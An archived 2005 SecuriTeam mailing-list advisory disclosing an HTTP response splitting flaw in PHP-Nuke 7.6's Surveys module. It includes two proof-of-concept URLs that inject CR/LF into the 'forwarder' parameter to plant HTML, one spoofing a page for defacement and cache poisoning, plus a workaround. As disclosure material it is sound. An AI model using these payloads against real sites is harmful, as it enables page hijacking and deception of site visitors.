[UNIX] PHP-Nuke HTTP Response Splitting
From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/05
- Previous message: SecuriTeam: "[NT] PMSoftware Simple Web Server Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Apr 2005 15:03:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PHP-Nuke HTTP Response Splitting
------------------------------------------------------------------------
SUMMARY
<http://phpnuke.org/> Php-Nuke is "a popular open source content
management system, written in PHP by Francisco Burzi. This CMS is used on
manythousands websites, because it's freeware, easy to install and manage
and has broad set of features".
Due to improper filtering of user provided parameters, especially
filtering of CR/LF characters, PHP-Nuke is vulnerable to HTTP response
splitting vulnerability.
DETAILS
Vulnerable Systems:
* PHP-Nuke version 7.6 and prior
HTTP Response Splitting occurs when a web application fails to reject
illegal input such as the CR and LF characters. In PHP-Nuke's mainfile.php
module there is filtering function (removecrlf), but its not used in
Surveys module.
Redirection:
http://localhost/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a
%3Chtml%3EHELLO I AM VULNERABLE TO HTTP RESPONSE SPLITTING
%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5
Cross User Defacement:
Example of more serious exploiting, involving Cross User Defacement, Cache
Poisoning and page hijacking:
http://localhost/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a
%3Chtml%3E %3Ctitle%3E This is a spoofed site %3C/title%3E %3Cbody
bgcolor=black%3E %3Cfont size=10 color=blue%3E Welcome to my PHP Nuke
Website%3C/body%3E %3C/html%3E
Workaround:
Add CR/LF check for all user provided input variables.
ADDITIONAL INFORMATION
The information has been provided by <mailto:dcrab@hackerscenter.com>
dcrab.
The original article can be found at: <http://digitalparadox.org/>
http://digitalparadox.org/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] PMSoftware Simple Web Server Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
